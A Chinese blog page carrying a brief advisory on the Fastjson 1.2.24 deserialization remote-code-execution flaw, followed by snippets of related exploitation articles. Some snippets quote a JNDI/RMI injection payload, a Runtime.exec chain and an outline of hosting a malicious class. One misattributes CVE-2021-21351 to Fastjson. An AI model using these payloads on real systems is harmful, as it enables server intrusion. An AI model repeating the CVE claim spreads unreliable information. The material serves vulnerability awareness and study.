Fastjson 爆出远程代码执行高危漏洞

最新推荐文章于 2024-08-11 01:45:18 发布
最新推荐文章于 2024-08-11 01:45:18 发布
阅读量4.2k 收藏 1
点赞数 1
分类专栏: 生活杂记

fastjson近日曝出代码执行漏洞,恶意用户可利用此漏洞进行远程代码执行,入侵服务器,漏洞评级为“高危”。

基本介绍
fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。


漏洞介绍
fastjson在1.2.24以及之前版本近日曝出代码执行漏洞,当用户提交一个精心构造的恶意的序列化数据到服务器端时,fastjson在反序列化时存在漏洞,可导致远程任意代码执行漏洞。


风险:高风险
方式:黑客通过利用漏洞可以实现远程代码执行
影响:1.2.24及之前版本

 

安全版本:>=1.2.28

 

原文:http://www.oschina.net/news/82955/fastjson-flaw?from=20170319

 

最后欢迎大家访问我的个人网站:1024s

崔世勋
关注
专栏目录
Java代码审计之Fastjson反序列化漏洞详解
悦分享
09-16 2165
FastJson 是一个由阿里巴巴研发的java库,FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到Java Bean。“自2017年3月15日,fastjson官方主动爆出其在1.2.24及之前版本存在远程代码执行高危安全漏洞以来,各种新型绕过姿势层出不穷。漏洞被利用本质找到一条有效的攻击链,攻击链的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。
FastJson远程命令执行漏洞
PassionNingG的博客
09-03 1390
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。文章内容多来于如有侵权立删。# FastJson远程命令执行漏洞学习笔记fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
fastjson远程代码执行漏洞
网安君的博客
03-29 5716
Fastjson 1.2.24 远程代码执行漏洞 漏洞说明 FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 前提条件 开启autotype 影响范围 fastjson 1.2.22-1.2.24 jdk 1.7,1.8版本 漏洞复现 由于Fastj
科普文:Java基础系列之【字节码应用案例Fastjson反序列化漏洞
最新发布
为无为,事无事,味无味。
08-11 1059
transform方法利用Java的反射机制进行函数调用,传入的参数是input是一个实例化对象,利用这个方法便可以调用任意对象的任意方法(exec)从而执行命令,所以在DeSertPoc类里新建Transformer,最后组成的核心表达式为:((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("whoami");基于TemplateImpl的方法可以直接执行bytecodes。
Fastjson 1.2.47 远程命令执行漏洞
m0_63241485的博客
08-17 1232
astjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。...
处理Fastjson 远程代码执行漏洞CVSS
hello world
01-23 2752
我的项目并没有直接引入fastjson,但是引入了alipay-sdk-java,最后将它换成了高版本解决 <dependency> <groupId>com.alipay.sdk</groupId> <artifactId>alipay-sdk-java</artifactId> <version>4.22.30.ALL</version> </dependency> ...
Fastjson远程命令执行漏洞总结
weixin_52501704的博客
07-27 1113
将json字符串转化为json对象在net.sf.json中是这么做的//将json字符串转换为json对象在fastjson中是这么做的//将json字符串转换为json对象// Reference需要传入三个参数(className,factory,factoryLocation)// 第一个参数随意填写即可,第二个参数填写我们http服务下的类名,第三个参数填写我们的远程地址// ReferenceWrapper包裹Reference类,使其能够通过RMI进行远程访问。
从源码看Log4j2、FastJson漏洞
wdj_yyds的博客
12-31 4541
前言 远程代码漏洞对广大程序员来并不陌生,远程代码执行是指攻击者可能会通过远程调用的方式来攻击或控制计算机设备,无论该设备在哪里。如果远程代码执行的是一个死循环那服务器的CPU不得美滋滋了。 前段时间,Java 界的知名日志框架 Log4j2 发现了远程代码执行漏洞漏洞风暴席卷各大公司,编程届异常火热(加班),我们是万万没想到那么牛逼的日志框架有BUG。 这次安全漏洞也有个小插曲,我司的员工发现了漏洞,上报了Apache没告知GXB,我司也受到了处罚,希望下次引以为戒,不过这事程序员不背锅,管理下次
fastjson复现
qq_42133828的博客
07-13 1898
fastjson2017-0315远程代码执行漏洞复现 漏洞名称: fastjson远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://github.com/alibaba/fastjson/wiki/security_update_20170315 公布时间: 2017-03-15 涉及应用版本: fastjson小于1.2.24的所有版本 poc适用于...
fastjson到底做错了什么?为什么会被频繁爆出漏洞
xiaoliangtx的博客
07-15 603
fastjson大家一定都不陌生,这是阿里巴巴的开源一个JSON解析库,通常被用于将Java Bean和JSON 字符串之间进行转换。 前段时间,fastjson爆出过多次存在漏洞,很多文章报道了这件事儿,并且给出了升级建议。 但是作为一个开发者,我更关注的是他为什么会频繁被爆漏洞?于是我带着疑惑,去看了下fastjson的releaseNote以及部分源代码。 最终发现,这其实和fastjson中的一个AutoType特性有关。 从2019年7月份发布的v1.2.59一直到2020年6月份发布的 v1.
Fastjson 反序列化漏洞利用总结
roukmanx的博客
12-19 1598
本篇文章对Fastjson漏洞利用的过程做个简单的记录。 背景: Fastjson是Alibaba开发的,java语言编写的高性能JSON库,采用“假定有序快速匹配”的算法,号称Java语言中最快的JSON库。 其项目地址为https://github.com/alibaba/fastjson,其提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化。示例代码:...
Fastjson高危漏洞!附解决方法(实战)
langshen1314的专栏
06-17 740
Fastjson
Fastjson反序列化高危漏洞系列-part1:1.2.x — 1.2.47
mole_exp的博客
12-09 3536
文章目录前言1、Fastjson的序列化和反序列化1.1 fastjson序列化1.2 fastjson反序列化1.2.1 fastjson反序列化漏洞原理1.2.2 fastjson反序列化漏洞Demo2、Fastjson <= 1.2.242.1 利用链 - TemplatesImpl2.1.1 限制条件2.1.2 构造PoC问题1:为什么_bytecodes中的字节码要经过base64编码问题2:恶意类为什么要继承AbstractTranslet类问题3:fastjson为什么认为_output
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 3256
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
高危安全漏洞Fastjson | 新发现高危autotype开关绕过安全漏洞
慌途L
06-12 3229
前言 Fastjson <=1.2.68版本存在远程代码执行漏洞漏洞被利用可直接获取服务器权限。 漏洞详情 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean 。 本次漏洞发现,其autotype开关的限制可被绕过,然后链式地反序列化某些原本是不能被反序列化的有安全风险的类。 漏洞实际造成的危害与 gadgets 有关,gadgets中使用的类必须不在黑名单中,本漏洞无法绕
Fastjson疑似又出现安全漏洞
灵熙云工作室
03-22 4842
昨天,Fastjson发布了最新1.2.67版本,经过内部安全人员分析研究,本次发布属于重大安全问题更新,小于1.2.67版本的Fastjson存在远程代码执行漏洞,可导致直接获取服务器权限。该漏洞利用门槛低,漏洞利用原理可能会被短时间内研究并公开,风险影响范围较大。 漏洞影响范围: Fastjson version < 1.2.67 修复方案: 建议升级Fastjso...
rmi远程代码执行漏洞_fastjson远程代码执行漏洞复现
weixin_39849153的博客
12-22 368
漏洞原理fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行漏洞产生。漏洞利用漏洞利用需要我们在vps上启一个RMI服务并调用class文件(class文件为我们的恶意文件)大概过程就是生成恶意class文件py开启web服务然后开...
rmi远程代码执行漏洞_Fastjson <=1.2.62 远程代码执行-漏洞复现
weixin_39929723的博客
12-22 314
影响范围:Fastjson<=1.2.62需要开启autotypepoc:String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";pom:com.alibabafastjson1.2.62commons-...
fastjson 1.22-1.24 TemplatesImpl反序列化漏洞分析
Vicl1fe的博客
07-09 740
前言 看了别人的文章,我也打算先分析TemplatesImpl利用链,关于fastjson的使用可以参考:fastjson 使用 环境 jdk 1.8_102 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</version> </dependency&
fastjson< 1.2.69远程代码执行漏洞cve编号
01-04
fastjson< 1.2.69远程代码执行漏洞的CVE编号是CVE-2021-21351。该漏洞源于fastjson在处理JSON数据时存在安全漏洞,攻击者可以通过精心构造的JSON数据来实现远程代码执行,从而对系统进行攻击。 漏洞的产生主要是由于fastjson在处理反序列化时存在漏洞,攻击者可以通过构造恶意的JSON数据来触发fastjson的反序列化过程,最终实现执行恶意代码的目的。由于fastjson是非常常见的JSON解析库,因此该漏洞可能影响许多使用fastjson的应用程序。 为了防范这一漏洞,建议及时更新fastjson至最新版本,并且在使用fastjson解析JSON数据时,对输入的数据进行严格的验证和过滤,避免恶意JSON数据的注入。此外,也应加强系统安全意识教育,及时关注官方的安全公告,并且注意其他安全防护措施,以保护系统免受漏洞的攻击。 总之,CVE-2021-21351是一个比较严重的远程代码执行漏洞,对系统的安全性造成了潜在威胁。我们应该保持警惕,及时采取相应的安全防护措施,以确保系统的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值